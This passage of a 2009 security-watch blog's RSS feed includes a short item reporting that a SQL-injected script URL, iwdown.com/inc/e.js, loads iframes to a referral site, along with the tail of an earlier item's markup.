  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/152/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/152/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/152/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/152/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/152/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/152/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/152/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/152/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/152/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/152/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=152&subd=s3cwatch&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2009/02/26/deabakcomzjs/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
		<item>
		<title>iwdown.com/inc/e.js</title>
		<link>http://s3cwatch.wordpress.com/2009/01/22/iwdowncomincejs/</link>
		<comments>http://s3cwatch.wordpress.com/2009/01/22/iwdowncomincejs/#comments</comments>
		<pubDate>Thu, 22 Jan 2009 14:26:50 +0000</pubDate>
		<dc:creator>s3cu</dc:creator>
				<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://s3cwatch.wordpress.com/?p=147</guid>
		<description><![CDATA[this sql-injected URL contains iframes to www.advpoints.com.
Seems to be profiting thru referrals rather than injecting malware.
       <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=147&subd=s3cwatch&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>this sql-injected URL contains iframes to www.advpoints.com.<br />
Seems to be profiting thru referrals rather than injecting malware.</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/s3cwatch.wordpress.com/147/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/s3cwatch.wordpress.com/147/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/s3cwatch.wordpress.com/147/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/s3cwatch.wordpress.com/147/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/s3cwatch.wordpress.com/147/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/s3cwatch.wordpress.com/147/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/s3cwatch.wordpress.com/147/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/s3cwatch.wordpress.com/147/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/s3cwatch.wordpress.com/147/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/s3cwatch.wordpress.com/147/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=s3cwatch.wordpress.com&blog=3886751&post=147&subd=s3cwatch&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://s3cwatch.wordpress.com/2009/01/22/iwdowncomincejs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">s3cu</media:title>
		</media:content>
	</item>
	</channel>
</rss>